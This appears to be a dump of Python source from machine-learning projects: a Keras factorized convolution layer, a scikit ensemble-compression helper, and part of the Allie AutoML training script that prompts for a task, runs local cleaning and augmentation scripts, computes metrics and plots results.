all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
pre_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
post_kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
pre_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
post_kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
pre_kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
post_kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
# Input shape
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
# Output shape
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
input_components=None,
output_components=None,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
pre_kernel_initializer='glorot_uniform',
kernel_initializer='glorot_uniform',
post_kernel_initializer='glorot_uniform',
bias_initializer='zeros',
pre_kernel_regularizer=None,
kernel_regularizer=None,
post_kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
pre_kernel_constraint=None,
kernel_constraint=None,
post_kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(FactorizedConv2DTucker, self).__init__(**kwargs)
rank = 2
self.rank = rank
self.input_components = input_components
self.output_components = output_components
self.filters = filters
self.output_components = output_components
self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = K.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
self.activation = activations.get(activation)
self.use_bias = use_bias
self.pre_kernel_initializer = initializers.get(pre_kernel_initializer)
self.kernel_initializer = initializers.get(kernel_initializer)
self.post_kernel_initializer = initializers.get(post_kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.pre_kernel_regularizer = regularizers.get(pre_kernel_regularizer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.post_kernel_regularizer = regularizers.get(post_kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.pre_kernel_constraint = constraints.get(pre_kernel_constraint)
self.kernel_constraint = constraints.get(kernel_constraint)
self.post_kernel_constraint = constraints.get(post_kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.input_spec = InputSpec(ndim=rank + 2) # batch, H, W, C
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
if self.input_components is None:
input_components = input_dim
else:
input_components = self.input_components
if self.output_components is None:
output_components = self.filters
else:
output_components = self.output_components
kernel_shape = self.kernel_size + (input_components, output_components)
if self.input_components is None:
self.pre_kernel = None
else:
pre_kernel_shape = (1, 1) + (input_dim, self.input_components)
self.pre_kernel = self.add_weight(pre_kernel_shape,
initializer=self.pre_kernel_initializer,
name='pre_kernel',
regularizer=self.pre_kernel_regularizer,
constraint=self.pre_kernel_constraint)
self.kernel = self.add_weight(kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
if self.output_components is None:
self.post_kernel = None
else:
post_kernel_shape = (1, 1) + (self.output_components, self.filters)
self.post_kernel = self.add_weight(post_kernel_shape,
initializer=self.post_kernel_initializer,
name='post_kernel',
regularizer=self.post_kernel_regularizer,
constraint=self.post_kernel_constraint)
if self.use_bias:
self.bias = self.add_weight((self.filters,),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
# Set input spec.
self.input_spec = InputSpec(ndim=self.rank + 2,
axes={channel_axis: input_dim})
self.built = True
def call(self, inputs):
h = inputs
if self.pre_kernel is not None:
h = K.conv2d(
h,
self.pre_kernel,
strides=(1, 1),
padding='valid',
data_format=self.data_format,
dilation_rate=(1, 1),
)
h = K.conv2d(
h,
self.kernel,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate,
)
if self.post_kernel is not None:
h = K.conv2d(
h,
self.post_kernel,
strides=(1, 1),
padding='valid',
data_format=self.data_format,
dilation_rate=(1, 1),
)
outputs = h
if self.use_bias:
outputs = K.bias_add(
outputs,
self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_last':
space = input_shape[1:-1]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0],) + tuple(new_space) + (self.filters,)
if self.data_format == 'channels_first':
space = input_shape[2:]
new_space = []
for i in range(len(space)):
new_dim = conv_utils.conv_output_length(
space[i],
self.kernel_size[i],
padding=self.padding,
stride=self.strides[i],
dilation=self.dilation_rate[i])
new_space.append(new_dim)
return (input_shape[0], self.filters) + tuple(new_space)
def get_config(self):
config = {
'input_components': self.input_components,
'output_components': self.output_components,
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'pre_kernel_initializer': initializers.serialize(self.pre_kernel_initializer),
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'post_kernel_initializer': initializers.serialize(self.post_kernel_initializer),
'bias_initializer': initializers.serialize(self.kernel_initializer),
'pre_kernel_regularizer': regularizers.serialize(self.pre_kernel_regularizer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'post_kernel_regularizer': regularizers.serialize(self.post_kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'pre_kernel_constraint': constraints.serialize(self.pre_kernel_constraint),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'post_kernel_constraint': constraints.serialize(self.post_kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(FactorizedConv2DTucker, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
custom_layers = {
'FactorizedConv2DTucker': FactorizedConv2DTucker,
'FactorizedDense': FactorizedDense,
}
```
#### File: scikit-small-ensemble/scikit_small_ensemble/scikit_ensemble.py
```python
import lz4 as zlib
import tempfile
import joblib
import os
try:
import _pickle as pickle
except ImportError:
try:
import cPickle as pickle
except ImportError:
print('cPickle is not installed. Using the builtin pickle instead.')
import pickle
class CompressedEstimators(object):
def __init__(self, estimators, ratio):
self.cutoff = int(len(estimators) * ratio)
self.estimators = [
zlib.compress(pickle.dumps(x)) if i < self.cutoff else x
for i, x in enumerate(estimators)
]
def __getitem__(self, index):
estimator = self.estimators[index]
if index < self.cutoff:
return pickle.loads(zlib.decompress(estimator))
else:
return estimator
def __len__(self):
return len(self.estimators)
class DiskEstimators(object):
def __init__(self, estimators, ratio):
self.cutoff = int(len(estimators) * ratio)
self.saved_dir = tempfile.mkdtemp()
for i in range(self.cutoff):
joblib.dump(estimators[i], os.path.join(self.saved_dir, str(i)), compress=0)
self.estimators = [
os.path.join(self.saved_dir, str(i)) if i < self.cutoff else x
for i, x in enumerate(estimators)
]
def __getitem__(self, index):
estimator = self.estimators[index]
if index < self.cutoff:
return joblib.load(estimator, mmap_mode='r')
else:
return estimator
def __len__(self):
return len(self.estimators)
```
#### File: allie/training/model.py
```python
import os, sys, pickle, json, random, shutil, time, itertools, uuid, datetime, uuid, psutil, json, platform
from pyfiglet import Figlet
f=Figlet(font='doh')
print(f.renderText('Allie'))
f=Figlet(font='doom')
import pandas as pd
import matplotlib.pyplot as plt
###############################################################
## CREATE HELPER FUNCTIONS ##
###############################################################
def most_common(lst):
'''
get most common item in a list
'''
return max(set(lst), key=lst.count)
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def get_folders(listdir):
folders=list()
for i in range(len(listdir)):
if listdir[i].find('.') < 0:
folders.append(listdir[i])
return folders
def classifyfolder(listdir):
filetypes=list()
for i in range(len(listdir)):
if listdir[i].endswith(('.mp3', '.wav')):
filetypes.append('audio')
elif listdir[i].endswith(('.png', '.jpg')):
filetypes.append('image')
elif listdir[i].endswith(('.txt')):
filetypes.append('text')
elif listdir[i].endswith(('.mp4', '.avi')):
filetypes.append('video')
elif listdir[i].endswith(('.csv')):
filetypes.append('csv')
counts={'audio': filetypes.count('audio'),
'image': filetypes.count('image'),
'text': filetypes.count('text'),
'video': filetypes.count('video'),
'csv': filetypes.count('csv')}
# get back the type of folder (main file type)
countlist=list(counts)
countvalues=list(counts.values())
maxvalue=max(countvalues)
maxind=countvalues.index(maxvalue)
return countlist[maxind]
def pull_element(mylist, element):
pull_=list()
for i in range(len(mylist)):
pull_.append(mylist[i][element])
return pull_
def convert_csv(X_train, y_train, labels, mtype, classes):
'''
Take in a array of features and labels and output a
pandas DataFrame format for easy .CSV expor and for model training.
This is important to make sure all machine learning training sessions
use the same dataset (so they can be benchmarked appropriately).
'''
# from pandas merging guide https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html
feature_list=labels
data=list()
for i in tqdm(range(len(X_train)), desc='converting csv...'):
newlist=list()
for j in range(len(X_train[i])):
newlist.append([X_train[i][j]])
temp=pd.DataFrame(dict(zip(feature_list,newlist)), index=[i])
# print(temp)
data.append(temp)
data = pd.concat(data)
if mtype == 'c':
data['class_']=y_train
elif mtype == 'r':
if len(classes) == 1:
data[classes[0]]=y_train
else:
for j in range(len(classes)):
newy=pull_element(y_train, j)
data[classes[j]]=newy
data=pd.DataFrame(data, columns = list(data))
# print this because in pretty much every case you will write the .CSV file afterwards
print('writing csv file...')
return data
def device_info():
cpu_data={'memory':psutil.virtual_memory(),
'cpu percent':psutil.cpu_percent(),
'cpu times':psutil.cpu_times(),
'cpu count':psutil.cpu_count(),
'cpu stats':psutil.cpu_stats(),
'cpu swap':psutil.swap_memory(),
'partitions':psutil.disk_partitions(),
'disk usage':psutil.disk_usage('/'),
'disk io counters':psutil.disk_io_counters(),
'battery':psutil.sensors_battery(),
'boot time':psutil.boot_time(),
}
data={'time':datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
'timezone':time.tzname,
'operating system': platform.system(),
'os release':platform.release(),
'os version':platform.version(),
'cpu data':cpu_data,
'space left': list(psutil.disk_usage('/'))[2]/1000000000}
return data
def get_metrics(clf, problemtype, mtype, default_training_script, common_name, X_test, y_test, classes, modelname, settings, model_session, transformer_name, created_csv_files, test_data, model_start_time):
'''
get the metrics associated iwth a classification and regression problem
and output a .JSON file with the training session.
'''
metrics_=dict()
y_true=y_test
if default_training_script not in ['autogluon', 'autokeras', 'autopytorch', 'alphapy', 'atm', 'keras', 'devol', 'ludwig', 'safe', 'neuraxle']:
y_pred=clf.predict(X_test)
elif default_training_script=='alphapy':
# go to the right folder
curdir=os.getcwd()
print(os.listdir())
os.chdir(common_name+'_alphapy_session')
alphapy_dir=os.getcwd()
os.chdir('input')
os.rename('test.csv', 'predict.csv')
os.chdir(alphapy_dir)
os.system('alphapy --predict')
os.chdir('output')
listdir=os.listdir()
for k in range(len(listdir)):
if listdir[k].startswith('predictions'):
csvfile=listdir[k]
y_pred=pd.read_csv(csvfile)['prediction']
os.chdir(curdir)
elif default_training_script == 'autogluon':
from autogluon import TabularPrediction as task
test_data=test_data.drop(labels=['class'],axis=1)
y_pred=clf.predict(test_data)
elif default_training_script == 'autokeras':
y_pred=clf.predict(X_test).flatten()
elif default_training_script == 'autopytorch':
y_pred=clf.predict(X_test).flatten()
elif default_training_script == 'atm':
curdir=os.getcwd()
os.chdir('atm_temp')
data = pd.read_csv('test.csv').drop(labels=['class_'], axis=1)
y_pred = clf.predict(data)
os.chdir(curdir)
elif default_training_script == 'ludwig':
data=pd.read_csv('test.csv').drop(labels=['class_'], axis=1)
pred=clf.predict(data)['class__predictions']
y_pred=np.array(list(pred), dtype=np.int64)
elif default_training_script == 'devol':
X_test=X_test.reshape(X_test.shape+ (1,)+ (1,))
y_pred=clf.predict_classes(X_test).flatten()
elif default_training_script=='keras':
if mtype == 'c':
y_pred=clf.predict_classes(X_test).flatten()
elif mtype == 'r':
y_pred=clf.predict(X_test).flatten()
elif default_training_script=='neuraxle':
y_pred=clf.transform(X_test)
elif default_training_script=='safe':
# have to make into a pandas dataframe
test_data=pd.read_csv('test.csv').drop(columns=['class_'], axis=1)
y_pred=clf.predict(test_data)
print(y_pred)
# get classification or regression metrics
if mtype in ['c', 'classification']:
# now get all classification metrics
mtype='classification'
metrics_['accuracy']=metrics.accuracy_score(y_true, y_pred)
metrics_['balanced_accuracy']=metrics.balanced_accuracy_score(y_true, y_pred)
try:
metrics_['precision']=metrics.precision_score(y_true, y_pred)
except:
metrics_['precision']='n/a'
try:
metrics_['recall']=metrics.recall_score(y_true, y_pred)
except:
metrics_['recall']='n/a'
try:
metrics_['f1_score']=metrics.f1_score (y_true, y_pred, pos_label=1)
except:
metrics_['f1_score']='n/a'
try:
metrics_['f1_micro']=metrics.f1_score(y_true, y_pred, average='micro')
except:
metrics_['f1_micro']='n/a'
try:
metrics_['f1_macro']=metrics.f1_score(y_true, y_pred, average='macro')
except:
metrics_['f1_macro']='n/a'
try:
metrics_['roc_auc']=metrics.roc_auc_score(y_true, y_pred)
except:
metrics_['roc_auc']='n/a'
try:
metrics_['roc_auc_micro']=metrics.roc_auc_score(y_true, y_pred, average='micro')
except:
metrics_['roc_auc_micro']='n/a'
try:
metrics_['roc_auc_macro']=metrics.roc_auc_score(y_true, y_pred, average='macro')
except:
metrics_['roc_auc_micro']='n/a'
metrics_['confusion_matrix']=metrics.confusion_matrix(y_true, y_pred).tolist()
metrics_['classification_report']=metrics.classification_report(y_true, y_pred, target_names=classes)
plot_confusion_matrix(np.array(metrics_['confusion_matrix']), classes)
try:
# predict_proba only works for or log loss and modified Huber loss.
# https://stackoverflow.com/questions/47788981/sgdclassifier-with-predict-proba
try:
y_probas = clf.predict_proba(X_test)[:, 1]
except:
try:
y_probas = clf.decision_function(X_test)[:, 1]
except:
print('error making y_probas')
plot_roc_curve(y_test, [y_probas], [default_training_script])
except:
print('error plotting ROC curve')
print('predict_proba only works for or log loss and modified Huber loss.')
elif mtype in ['r', 'regression']:
# now get all regression metrics
mtype='regression'
metrics_['mean_absolute_error'] = metrics.mean_absolute_error(y_true, y_pred)
metrics_['mean_squared_error'] = metrics.mean_squared_error(y_true, y_pred)
metrics_['median_absolute_error'] = metrics.median_absolute_error(y_true, y_pred)
metrics_['r2_score'] = metrics.r2_score(y_true, y_pred)
plot_regressor(clf, classes, X_test, y_test)
data={'sample type': problemtype,
'training time': time.time()-model_start_time,
'created date': str(datetime.datetime.now()),
'device info': device_info(),
'session id': model_session,
'classes': classes,
'problem type': mtype,
'model name': modelname,
'model type': default_training_script,
'metrics': metrics_,
'settings': settings,
'transformer name': transformer_name,
'training data': created_csv_files,
'sample X_test': X_test[0].tolist(),
'sample y_test': y_test[0].tolist()}
if modelname.endswith('.pickle'):
jsonfilename=modelname[0:-7]+'.json'
elif modelname.endswith('.h5'):
jsonfilename=modelname[0:-3]+'.json'
else:
jsonfilename=modelname+'.json'
jsonfile=open(jsonfilename,'w')
json.dump(data,jsonfile)
jsonfile.close()
# also output requirements.txt for reproducibilty purposes
curdir=os.getcwd()
basedir=prev_dir(curdir)
os.chdir(basedir)
os.system('pip3 freeze -> requirements.txt')
# FUTURE - add in optional copy of cleaning, augmentation, and feature libraries contextually
# try:
# shutil.copytree(prev_dir(prev_dir(basedir))+'/features', basedir+'/features')
# except:
# print('error copying features')
# try:
# shutil.copytree(prev_dir(prev_dir(basedir))+'/cleaning', basedir+'/cleaning')
# except:
# print('error copying cleaning techniques')
# shutil.copytree(prev_dir(prev_dir(basedir))+'/augmentation', basedir+'/augmentation')
# except:
# print('error copying augmentation techniques')
os.chdir(curdir)
def plot_roc_curve(y_test, probs, clf_names):
'''
This function plots an ROC curve with the appropriate
list of classifiers.
'''
cycol = itertools.cycle('bgrcmyk')
for i in range(len(probs)):
print(y_test)
print(probs[i])
try:
fper, tper, thresholds = roc_curve(y_test, probs[i])
plt.plot(fper, tper, color=next(cycol), label=clf_names[i]+' = %s'%(str(round(metrics.auc(fper, tper), 3))))
plt.plot([0, 1], [0, 1], color='darkblue', linestyle='--')
except:
print('passing %s'%(clf_names[i]))
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic (ROC) Curve')
plt.legend()
plt.tight_layout()
plt.savefig('roc_curve.png')
plt.close()
def plot_confusion_matrix(cm, classes, normalize=True, title='Confusion matrix', cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("\nNormalized confusion matrix")
else:
print('\nConfusion matrix, without normalization')
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
fmt = '.2f' if normalize else 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.tight_layout()
plt.savefig('confusion_matrix.png')
plt.close()
def plot_regressor(regressor, classes, X_test, y_test):
'''
plot regression models with a bar chart.
'''
try:
y_pred = regressor.predict(X_test)
# plot the first 25 records
if len(classes) == 2:
df = pd.DataFrame({'Actual': y_test.flatten(), 'Predicted': y_pred.flatten()})
df1 = df.head(25)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.tight_layout()
plt.savefig('bar_graph_predictions.png')
plt.close()
# plot a straight line on the data
plt.scatter(X_test, y_test, color='gray')
plt.plot(X_test, y_pred, color='red', linewidth=2)
plt.tight_layout()
plt.savefig('straight_line_predictions.png')
plt.close()
else:
# multi-dimensional generalization
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df1 = df.head(25)
df1.plot(kind='bar',figsize=(10,8))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.tight_layout()
plt.savefig('bar_graph_predictions.png')
plt.close()
except:
print('error plotting regressor')
def pursue_modeling(mtype, model_dir, problemtype, default_training_script,common_name_model):
'''
simple script to decide whether or not to continue modeling the data.
'''
try:
model_listdir=os.listdir(model_dir+'/'+problemtype+'_models')
except:
model_listdir=list()
# note that these are tpot definitions
model_exists=False
if default_training_script == 'tpot':
if common_name_model + '_classifier' in model_listdir and mtype == 'c':
model_exists=True
elif common_name_model +'_regression' in model_listdir and mtype == 'r':
model_exists=True
else:
# only look for naming conflicts with TPOT for now, can expand into the future.
model_exists=False
return model_exists, model_listdir
def get_csvfiles(listdir):
csvfiles=list()
for i in range(len(listdir)):
if listdir[i].endswith('.csv'):
csvfiles.append(listdir[i])
return csvfiles
###############################################################
## LOADING SETTINGS ##
###############################################################
# load the default feature set
cur_dir = os.getcwd()
prevdir= prev_dir(cur_dir)
sys.path.append(prevdir+'/train_dir')
settings=json.load(open(prevdir+'/settings.json'))
# get all the default feature arrays
default_audio_features=settings['default_audio_features']
default_text_features=settings['default_text_features']
default_image_features=settings['default_image_features']
default_video_features=settings['default_video_features']
default_csv_features=settings['default_csv_features']
create_csv=settings['create_csv']
# prepare training and testing data (should have been already featurized) - # of classes/folders
os.chdir(prevdir+'/train_dir')
data_dir=os.getcwd()
listdir=os.listdir()
folders=get_folders(listdir)
csvfiles=get_csvfiles(listdir)
# now assess folders by content type
data=dict()
for i in range(len(folders)):
os.chdir(folders[i])
listdir=os.listdir()
filetype=classifyfolder(listdir)
data[folders[i]]=filetype
os.chdir(data_dir)
###############################################################
## INITIALIZE CLASSES ##
###############################################################
# get all information from sys.argv, and if not,
# go through asking user for the proper parameters
try:
problemtype=sys.argv[1]
mtype=sys.argv[3]
if mtype == 'c':
classnum=sys.argv[2]
common_name=sys.argv[4]
classes=list()
for i in range(int(classnum)):
classes.append(sys.argv[i+5])
else:
classnum=1
problemtype='csv'
mtype=sys.argv[1]
csvfile=sys.argv[2]
classes=[sys.argv[3]]
common_name=csvfile[0:-4]
except:
# now ask user what type of problem they are trying to solve
mtype=input('is this a classification (c) or regression (r) problem? \n')
while mtype not in ['c','r']:
print('input not recognized...')
mtype=input('is this a classification (c) or regression (r) problem? \n')
if mtype == 'c':
problemtype=input('what problem are you solving? (1-audio, 2-text, 3-image, 4-video, 5-csv)\n')
while problemtype not in ['1','2','3','4','5']:
print('answer not recognized...')
problemtype=input('what problem are you solving? (1-audio, 2-text, 3-image, 4-video, 5-csv)\n')
if problemtype=='1':
problemtype='audio'
elif problemtype=='2':
problemtype='text'
elif problemtype=='3':
problemtype='image'
elif problemtype=='4':
problemtype='video'
elif problemtype=='5':
problemtype='csv'
if problemtype != 'csv':
print('\n OK cool, we got you modeling %s files \n'%(problemtype))
count=0
availableclasses=list()
for i in range(len(folders)):
if data[folders[i]]==problemtype:
availableclasses.append(folders[i])
count=count+1
classnum=input('how many classes would you like to model? (%s available) \n'%(str(count)))
print('these are the available classes: ')
print(availableclasses)
# get all if all (good for many classes)
classes=list()
if classnum=='all':
for i in range(len(availableclasses)):
classes.append(availableclasses[i])
else:
stillavailable=list()
for i in range(int(classnum)):
class_=input('what is class #%s \n'%(str(i+1)))
while class_ not in availableclasses and class_ not in '' or class_ in classes:
print('\n')
print('------------------ERROR------------------')
print('the input class does not exist (for %s files).'%(problemtype))
print('these are the available classes: ')
if len(stillavailable)==0:
print(availableclasses)
else:
print(stillavailable)
print('------------------------------------')
class_=input('what is class #%s \n'%(str(i+1)))
for j in range(len(availableclasses)):
stillavailable=list()
if availableclasses[j] not in classes:
stillavailable.append(availableclasses[j])
if class_ == '':
class_=stillavailable[0]
classes.append(class_)
elif problemtype == 'csv':
print('\n OK cool, we got you modeling %s files \n'%(problemtype))
print('csv file options are: %s \n'%(csvfiles))
csvfile=input('which csvfile would you like to use for classification? \n')
g=pd.read_csv(csvfile)
columns=list(g)
print('potential targets include: %s'%(columns))
target=input('what target would you like to use? \n')
csv_labels=g[target]
csv_features=g.drop([target], axis=1)
elif mtype =='r':
# for regression problems we need a target column to predict / classes from a .CSV
problemtype='csv'
# assumes the .CSV file is in the train dir
os.chdir(prevdir+'/train_dir')
listdir=os.listdir()
csvfiles=list()
for i in range(len(listdir)):
if listdir[i].endswith('.csv'):
csvfiles.append(listdir[i])
csvfile=input('what is the name of the spreadsheet (in ./train_dir) used for prediction? \n\n available: %s\n\n'%(str(csvfiles)))
while csvfile not in csvfiles:
print('answer not recognized...')
csvfile=input('what is the name of the spreadsheet (in ./train_dir) used for prediction? \n\n available: %s\n\n'%(str(csvfiles)))
# the available classes are only the numeric columns from the spreadsheet
data = pd.read_csv(csvfile)
columns = list(data)
availableclasses=list()
for i in range(len(columns)):
# look at filetype extension in each column
coldata=data[columns[i]]
sampletypes=list()
for j in range(len(coldata)):
try:
values=float(coldata[j])
sampletypes.append('numerical')
except:
if coldata[j].endswith('.wav'):
sampletypes.append('audio')
elif coldata[j].endswith('.txt'):
sampletypes.append('text')
elif coldata[j].endswith('.png'):
sampletypes.append('image')
elif coldata[j].endswith('.mp4'):
sampletypes.append('video')
else:
sampletypes.append('other')
coltype=most_common(sampletypes)
# correct the other category if needed
if coltype == 'other':
# if coltype.endswith('.csv'):
# coltype='csv'
if len(set(list(coldata))) < 10:
coltype='categorical'
else:
# if less than 5 unique answers then we can interpret this as text input
coltype='typedtext'
if coltype == 'numerical':
availableclasses.append(columns[i])
if len(availableclasses) > 0:
classnum=input('how many classes would you like to model? (%s available) \n'%(str(len(availableclasses))))
print('these are the available classes: %s'%(str(availableclasses)))
classes=list()
stillavailable=list()
for i in range(int(classnum)):
class_=input('what is class #%s \n'%(str(i+1)))
while class_ not in availableclasses and class_ not in '' or class_ in classes:
print('\n')
print('------------------ERROR------------------')
print('the input class does not exist (for %s files).'%(problemtype))
print('these are the available classes: ')
if len(stillavailable)==0:
print(availableclasses)
else:
print(stillavailable)
print('------------------------------------')
class_=input('what is class #%s \n'%(str(i+1)))
for j in range(len(availableclasses)):
stillavailable=list()
if availableclasses[j] not in classes:
stillavailable.append(availableclasses[j])
if class_ == '':
class_=stillavailable[0]
classes.append(class_)
else:
print('no classes available... ending session')
sys.exit()
common_name=input('what is the 1-word common name for the problem you are working on? (e.g. gender for male/female classification) \n')
###############################################################
## UPGRADE MODULES / LOAD MODULES ##
###############################################################
print('-----------------------------------')
print(' LOADING MODULES ')
print('-----------------------------------')
# upgrade to have the proper scikit-learn version later
os.chdir(cur_dir)
os.system('python3 upgrade.py')
import pandas as pd
from sklearn.model_selection import train_test_split
from tqdm import tqdm
import numpy as np
from sklearn import metrics
from sklearn.metrics import roc_curve
###############################################################
## CLEAN THE DATA ##
###############################################################
clean_data=settings['clean_data']
clean_dir=prevdir+'/cleaning'
if clean_data == True and mtype == 'c':
# only pursue augmentation strategies on directories of files and classification problems
print('-----------------------------------')
print(f.renderText('CLEANING DATA'))
print('-----------------------------------')
for i in range(len(classes)):
if problemtype == 'audio':
# clean audio via default_audio_cleaners
os.chdir(clean_dir+'/audio_cleaning')
elif problemtype == 'text':
# clean text via default_text_cleaners
os.chdir(clean_dir+'/text_cleaning')
elif problemtype == 'image':
# clean images via default_image_cleaners
os.chdir(clean_dir+'/image_cleaning')
elif problemtype == 'video':
# clean video via default_video_cleaners
os.chdir(clean_dir+'/video_cleaning')
elif problemtype == 'csv':
# clean .CSV via default_csv_cleaners
os.chdir(clean_dir+'/csv_cleaning')
os.system('python3 clean.py "%s"'%(data_dir+'/'+classes[i]))
elif clean_data == True and mtype == 'r':
for i in range(len(classes)):
if problemtype == 'csv':
# clean .CSV via default_csv_cleaners
os.chdir(clean_dir+'/csv_cleaning')
os.system('python3 clean.py "%s"'%(data_dir+'/'+classes[i]))
###############################################################
## AUGMENT THE DATA ##
###############################################################
augment_data=settings['augment_data']
augment_dir=prevdir+'/augmentation'
if augment_data == True and mtype == 'c':
# only pursue augmentation strategies on directories of files and classification problems
print('-----------------------------------')
print(f.renderText('AUGMENTING DATA'))
print('-----------------------------------')
for i in range(len(classes)):
if problemtype == 'audio':
# augment audio via default_audio_augmenters
os.chdir(augment_dir+'/audio_augmentation')
elif problemtype == 'text':
# augment text via default_text_augmenters
os.chdir(augment_dir+'/text_augmentation')
elif problemtype == 'image':
# augment images via default_image_augmenters
os.chdir(augment_dir+'/image_augmentation')
elif problemtype == 'video':
# augment video via default_video_augmenters
os.chdir(augment_dir+'/video_augmentation')
elif problemtype == 'csv':
# augment .CSV via default_csv_augmenters
os.chdir(augment_dir+'/csv_augmentation')
os.system('python3 augment.py "%s"'%(data_dir+'/'+classes[i]))
elif augment_data == True and mtype == 'r':
for i in range(len(classes)):
if problemtype == 'csv':
# featurize .CSV via default_csv_augmenters
os.chdir(augment_dir+'/csv_augmentation')
os.system('python3 augment.py "%s"'%(data_dir+'/'+classes[i]))
###############################################################
## FEATURIZE FILES ##
###############################################################
# now featurize each class (in proper folder)
if mtype == 'c':
data={}
print('-----------------------------------')
print(f.renderText('FEATURIZING DATA'))
print('-----------------------------------')
if problemtype == 'csv':
# csv features should have already been defined
# need to separate into number of unique classes
csv_labels=g[target]
csv_features=g.drop([target], axis=1)
csv_feature_labels=list(csv_features)
classes=list(set(list(csv_labels)))
for i in range(len(classes)):
class_type = classes[i]
feature_list=list()
label_list=list()
for i in range(len(csv_features)):
if csv_labels[i] == class_type:
feature_list.append(list(csv_features.iloc[i,:]))
label_list.append(csv_feature_labels)
data[class_type]=feature_list
else:
#
for i in range(len(classes)):
class_type=classes[i]
if problemtype == 'audio':
# featurize audio
os.chdir(prevdir+'/features/audio_features')
default_features=default_audio_features
elif problemtype == 'text':
# featurize text
os.chdir(prevdir+'/features/text_features')
default_features=default_text_features
elif problemtype == 'image':
# featurize images
